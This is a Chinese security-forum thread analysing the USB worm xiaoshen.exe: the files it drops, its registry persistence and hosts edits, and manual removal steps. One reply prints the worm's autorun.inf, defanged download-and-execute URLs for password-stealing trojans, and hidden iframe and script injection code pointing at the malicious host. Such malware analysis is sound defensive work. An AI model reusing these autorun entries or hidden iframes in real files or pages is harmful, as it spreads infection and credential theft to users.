瑞星卡卡安全论坛

xiaoshen.exe

都没看见过..昨天顺便跟一位网友拿了这个样本..

本以为就是个普通的U盘病毒..测试后发现这玩意也不好对付..会下载其他病毒..

运行 xiaoshen.exe 后 访问网络 生成
C:\WINDOWS\system32\Update.exe
C:\WINDOWS\system32\update2.exe
C:\WINDOWS\system32\update3.exe
C:\WINDOWS\system32\update4.exe
C:\WINDOWS\system32\update9.exe
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\63U70503\desktop.ini
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\63U70503\host[1].txt
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\63U70503\up5[1].jpg
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\B006ZRBG\desktop.ini
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\B006ZRBG\up2[1].jpg
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\LRVZUX8H\desktop.ini
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\LRVZUX8H\desktop.ini
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\OZENOVM1\desktop.ini
C:\Documents and Settings\mopery\Local Settings\Temporary Internet Files\Content.IE5\OZENOVM1\desktop.ini

还在每个盘符下 生成
xiaoshen.exe 和 autorun.inf

C:\WINDOWS\system32\drivers\etc\hosts
内容为
127.0.0.1    qq.etsoft.com.cn
61.152.90.31    zt.abcoll.com


然后 Update.exe 那几个分别运行..

C:\WINDOWS\system32\Update.exe
就写入一个注册表
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
[Update] C:\WINDOWS\system32\Update.exe


C:\WINDOWS\system32\update2.exe
释放文件
C:\Program Files\Common Files\Microsoft Shared\MSINFO\50948A91.dat
C:\Program Files\Common Files\Microsoft Shared\MSINFO\50948A91.dll
C:\WINDOWS\Help\wshmcepts.chm
修改系统文件 C:\WINDOWS\system32\verclsid.exe 为 C:\WINDOWS\system32\verclsid.exe.bak

注册表项
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
[{48A95094-5094-8A91-948A-094A90948A91}]

HKCR\CLSID\{48A95094-5094-8A91-948A-094A90948A91}\InProcServer32
[默认]C:\Program Files\Common Files\Microsoft Shared\MSINFO\50948A91.dll

具体参考:http://forum.ikaka.com/topic.asp?board=28&artid=8201339


C:\WINDOWS\system32\update3.exe
生成文件
C:\DOCUME~1\mopery\LOCALS~1\Temp\mc21.tmp
C:\nxldr.dat

注册表项
HKLM\SYSTEM\CurrentControlSet\Services\NetWorkLogon
HKLM\SYSTEM\CurrentControlSet\Services\mchInjDrv


C:\WINDOWS\system32\Update4.exe
生成文件
C:\20061023.dat
C:\20061026.dat
C:\WINDOWS\system32\Ravdm.exe
C:\WINDOWS\system32\Drivers\Rinld.sys

hosts 添加 125.65.77.72    www.qo263.com

C:\WINDOWS\system32\Ravdm.exe 具体的处理方法参考:http://forum.ikaka.com/topic.asp?board=28&artid=8156736


C:\WINDOWS\system32\update9.exe
生成文件
C:\WINDOWS\Intel\rundll32.exe
C:\WINDOWS\system32\ztdll.dll

注册表项
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[rzt] C:\WINDOWS\Intel\rundll32.exe

具体的处理方法..安全模式下操作..

先清空IE临时文件夹..
删除文件
C:\WINDOWS\system32\Update.exe
C:\WINDOWS\system32\update2.exe
C:\WINDOWS\system32\update3.exe
C:\WINDOWS\system32\update4.exe
C:\WINDOWS\system32\update9.exe

右键 打开 盘符
删除
xiaoshen.exe 和 autorun.inf

C:\WINDOWS\system32\drivers\etc\hosts  用 记事本 打开..
127.0.0.1      localhost
下面的全部删除..


C:\WINDOWS\system32\Update.exe
处理方法
删除注册表
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
[Update]


C:\WINDOWS\system32\update2.exe
参考:http://forum.ikaka.com/topic.asp?board=28&artid=8201339 处理..


C:\WINDOWS\system32\update3.exe
处理方法
删除文件
C:\DOCUME~1\mopery\LOCALS~1\Temp\mc21.tmp
C:\nxldr.dat

打开注册表 删除
HKLM\SYSTEM\CurrentControlSet\Services\NetWorkLogon
HKLM\SYSTEM\CurrentControlSet\Services\mchInjDrv


C:\WINDOWS\system32\Update4.exe
参考:http://forum.ikaka.com/topic.asp?board=28&artid=8156736 处理..


C:\WINDOWS\system32\update9.exe
处理方法
删除文件
C:\WINDOWS\Intel\rundll32.exe
C:\WINDOWS\system32\ztdll.dll

打开注册表 删除
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[rzt]


以上操作全部需要在安全模式下...

高手!大哥,用什么软件监测的?!

这么厉害,学习

学习班

补充一下,此病毒会锁定双击的

厉害！！我学习！你用什么软件监视到的？？

引用:

【6981313的贴子】高手!大哥,用什么软件监测的?! ………………

Tiny,SSM,GSS,等等都可以检测

M,偶刚从阳光那拿了个U盘的病毒。。。。。

唉.学习一下哈...好久没来看你发贴了.

呵呵，我也想看一下这个样本
有哪位朋友可以给我发一下，谢谢。

一开始从网友求助的日志中看到这病毒,我也还以为是个普通的U盘病毒,原来也不简单哦.
学习了

厉害，学习一下，谢谢拉

补一点：
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\
SHOWALL
以上一项需要重新写入

是来自“香港软件王国”的xiaoshao.exe么？2006-11-11 15:02xiaoshao.exe  Trojan-PSW.Win32.Delf.ln

下载：
hxxp://qq.ee28.cn/down/host.txt
设置hosts文件：
127.0.0.1 qq.etsoft.com.cn
61.152.90.31 zt.abcoll.com
下载执行：
hxxp://qq.ee28.cn/down/up.jpg  -->update.exe
hxxp://qq.ee28.cn/down/up1.jpg -->update2.exe Trojan-PSW.Win32.QQRob.jo
hxxp://qq.ee28.cn/down/up2.jpg -->update3.exe Trojan-PSW.Win32.Lmir.beh
hxxp://qq.ee28.cn/down/up3.jpg -->update4.exe
hxxp://qq.ee28.cn/down/up4.jpg -->update5.exe失效
hxxp://qq.ee28.cn/down/up5.jpg -->update9.exe
hxxp://qq.ee28.cn/down/up6.jpg -->update7.exe Trojan-PSW.Win32.Nilage.arz

X:\xiaoshen.exe
X:\autorun.inf
[AutoRun]
Open=xiaoshen.exe
shellexecute=xiaoshen.exe
shell\Auto\command=xiaoshen.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\

SHOWALL
"CheckedValue"=dword:00000001

MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Update=指向Update.exe

下载的木马不在讨论之内:-)

PS：“day day fucking!by kingdom software,co,hk updating....”来自香港软件王国？


-------------------------------------------------------

说明一下undate.exe的问题，其实是下载一个副本程序。

up.jpg  -->update.exe
访问：
<iframe src="hxxp://qq.ee28.cn/htm/" width="0" height="0" scrolling="0" frameborder="0"></iframe>
选择性跳转到hxxp://qq.ee28.cn/htm/s.htm
<iframe src="1234.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<script src='hxxp://s78.cnzz.com/stat.php?id=291770&web_id=291770' language='JavaScript' charset='gb2312'></script>
访问计数到这里hxxp://qq.ee28.cn/htm/1234.htm
下载：hxxp://qq.ee28.cn/down/down.exe -->mdb.exe 原来这个是副本
但这个档案比xiaoshao.exe少了下载设置hosts的行为:-)

PS：BBS上常见过几分钟后，update.exe开始下载木马的原因可能就是因为这几个跳转吧:-)

discover information:

come on baby!
string:my name is joines

是作者么？


我的分析贴：http://hi.baidu.com/killvir/blog/item/fe33033b122784ea14cecb5f.html

的确有些麻烦，谢谢斑竹提醒

学习

学习

厉害，学习！

xiaoshen.exe真是很厉害。我家里的电脑硬盘也是双击打不开，右击盘符时有Auto字样。移动硬盘里的文件受损，很多打不开，不得不把U盘格式化了，损失很重。用瑞星也杀不掉。单位的机子也犯同样的病，用金山在线杀毒显标杀掉了，但显示隐藏文件却改不过来。估计还没杀彻底。

我的都中了 ``当时发了帖子，好象都不知道啊`忽忽`

我问一下，这个
C:\WINDOWS\system32\drivers\etc\hosts 用 记事本 打开..
127.0.0.1 localhost
下面的全部删除..


hosts文件用记事本打开后，修改以后保存，怎么保存为原文件
我一保存就成了记事本文件了

学习中

.我也见过U盘中毒的时候.
特别难打开..
打开之后还是不可用的文件,.
真搞不动了

嘿嘿，不错。

又是下载器，头晕，学习

怎么解决auto啊,我都重新装了系统,可是问题还在!!格式化硬盘后可以解决,但是C盘怎么弄啊,是不是还要重新装系统啊!!郁闷了几天了!!原来是这个东西整出来的,郁闷啊!!
瑞星2006怎么杀不出来这个病毒啊,害死我了!!!我的游戏存档都没了!!郁闷!!
什么时候可以打个补丁啊!!!

还好原来不只我一个人中标!!!我都不知道怎么中的!!郁闷!!!

还有我怎么看不了我的隐藏文件,以前用 工具--文件夹选项--查看--显示所有文件和文件夹 就可以了.但现在老是回到不显示隐藏的文件和文件夹!!
晕怎么办啊,我游戏的备分在隐藏文件中,有什么办法看看啊!!!

学习

好专业！

呵呵，来学习一下